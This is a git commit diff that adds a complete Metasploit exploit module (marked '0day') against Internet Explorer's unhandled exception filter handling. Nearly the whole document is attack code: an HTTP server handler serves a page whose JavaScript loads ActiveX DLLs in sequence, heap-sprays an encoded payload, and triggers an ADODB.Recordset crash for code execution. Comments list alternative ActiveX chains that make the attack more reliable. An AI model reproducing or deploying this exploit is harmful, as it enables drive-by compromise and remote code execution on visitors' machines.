sup
git-svn-id: file:///home/svn/framework3/trunk@3809 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
7bd26e4925
commit
86c400a8bd
|
@ -0,0 +1,191 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Private::IeUnexpFilt < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::HttpServer::Html
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MS06-051 Unhandled Exception Filter Hijack',
|
||||
'Description' => %q{
|
||||
This module exploits a design error in the way that the unhandled
|
||||
exception filter chain is managed. By loading and unloading DLLs
|
||||
that register UEFs in the proper order, it is possible to cause
|
||||
the top-level unhandled exception filter to point to an invalid
|
||||
memory address. Using heap spraying techniques, it is possible
|
||||
to place attacker controlled code at the location that the top-level
|
||||
unhandled exception filter points. Generating an unhandled
|
||||
exception then leads to code execution.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'skape',
|
||||
],
|
||||
'Version' => '$Revision: 1.0 $',
|
||||
'References' =>
|
||||
[
|
||||
# 0day
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'MaxNops' => 0
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
# Target 0: Automatic
|
||||
[
|
||||
'Windows NT/2000/XP/2003 Automatic',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
},
|
||||
],
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
p = payload
|
||||
|
||||
# Re-generate the payload
|
||||
return if (request.qstring['window'].nil? and (p = regenerate_payload(cli)) == nil)
|
||||
|
||||
hex = p.encoded.unpack('H*')[0]
|
||||
content =
|
||||
"<html><script language='javascript'>
|
||||
var w1;
|
||||
var w2;
|
||||
|
||||
function win1()
|
||||
{
|
||||
// GBDetect is small, so we have to take steps to make sure
|
||||
// that the heap grows into the region. Therefore, we need
|
||||
// to load DLLs that will be loaded at lower addresses.
|
||||
|
||||
// This series works reliably, but relies on vmware:
|
||||
//new ActiveXObject('vmappcfg.ProjWz.9');
|
||||
//new ActiveXObject('GBDetect.Detect');
|
||||
//new ActiveXObject('vmhwcfg.Hwz.9');
|
||||
|
||||
// This series works reliably
|
||||
//new ActiveXObject('OPUCatalog.OPUCatalog11'); // office
|
||||
//new ActiveXObject('GBDetect.Detect'); // adobe -- trigger DLL
|
||||
//new ActiveXObject('NvCpl.NvCplLateBound'); // nvidia
|
||||
//new ActiveXObject('BarControl.GDSControl'); // realplayer
|
||||
|
||||
// works all by itself, just need to spray better
|
||||
//new ActiveXObject('GBDetect.Detect'); // adobe -- trigger DLL
|
||||
|
||||
// these may be useful...
|
||||
//new ActiveXObject('CDDBRealControl.CDDBControl');//realplayer
|
||||
//new ActiveXObject('CEnroll.CEnroll');
|
||||
|
||||
// These overlap on XPSP2, not on XPSP0. msado15 is larger
|
||||
new ActiveXObject('RDS.DataControl'); // msadco
|
||||
new ActiveXObject('ADODB.Record'); // msado15
|
||||
|
||||
// Acrobat OCX
|
||||
new ActiveXObject('GBDetect.Detect'); // adobe -- trigger DLL
|
||||
|
||||
window.opener.open2();
|
||||
}
|
||||
|
||||
function win2()
|
||||
{
|
||||
// Some random real player activex control that sets an unhandled
|
||||
// exception filter indirectly through another DLL.
|
||||
//new ActiveXObject('IERJCtl.IERJCtl');
|
||||
|
||||
// Even though an object instance isn't created as a result of this,
|
||||
// the DLL associated with this COM object is still loaded, causing
|
||||
// it to register its UEF.
|
||||
try
|
||||
{
|
||||
new ActiveXObject('CompatUI.Util');
|
||||
} catch(err)
|
||||
{
|
||||
}
|
||||
|
||||
window.opener.go();
|
||||
}
|
||||
|
||||
function crash()
|
||||
{
|
||||
var sp1 = spray(0);
|
||||
|
||||
// IE crash bug #134234
|
||||
a = new ActiveXObject('ADODB.Recordset');
|
||||
try { a.Filter = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' } catch(e) { }
|
||||
try { a.Filter = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' } catch(e) { }
|
||||
try { a.Filter = 0x7ffffffe; } catch(e) { }
|
||||
}
|
||||
|
||||
function spray(length)
|
||||
{
|
||||
var payloadHex = \"#{hex}\";
|
||||
var payload = unescape(payloadHex.replace(/([0-9A-Fa-f]{2})([0-9A-Fa-f]{2})/g, \"%u$2$1\"));
|
||||
|
||||
CollectGarbage();
|
||||
|
||||
var spray = unescape('%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141');
|
||||
|
||||
if (length == 0)
|
||||
length = 0x4000000;
|
||||
|
||||
do
|
||||
{
|
||||
if (spray.length >= 0x10000)
|
||||
spray += payload;
|
||||
spray += spray;
|
||||
} while (spray.length < length);
|
||||
|
||||
spray += payload;
|
||||
}
|
||||
|
||||
function close2()
|
||||
{
|
||||
w2.close();
|
||||
setTimeout('crash();', 1000);
|
||||
}
|
||||
|
||||
function close1()
|
||||
{
|
||||
w1.close();
|
||||
setTimeout('close2();', 1000);
|
||||
}
|
||||
|
||||
function go()
|
||||
{
|
||||
setTimeout('close1();', 1000);
|
||||
}
|
||||
|
||||
function open2()
|
||||
{
|
||||
w2 = window.open('#{request.resource}?window=1', 'win2');
|
||||
}
|
||||
|
||||
if (window.opener == null)
|
||||
{
|
||||
spray(0x100000);
|
||||
|
||||
w1 = window.open('#{request.resource}?window=1', 'win1');
|
||||
}
|
||||
else
|
||||
{
|
||||
if (window.name == 'win1')
|
||||
win1();
|
||||
else
|
||||
win2();
|
||||
}
|
||||
</script></html>";
|
||||
|
||||
# Transmit the response to the client
|
||||
send_response(cli, content)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue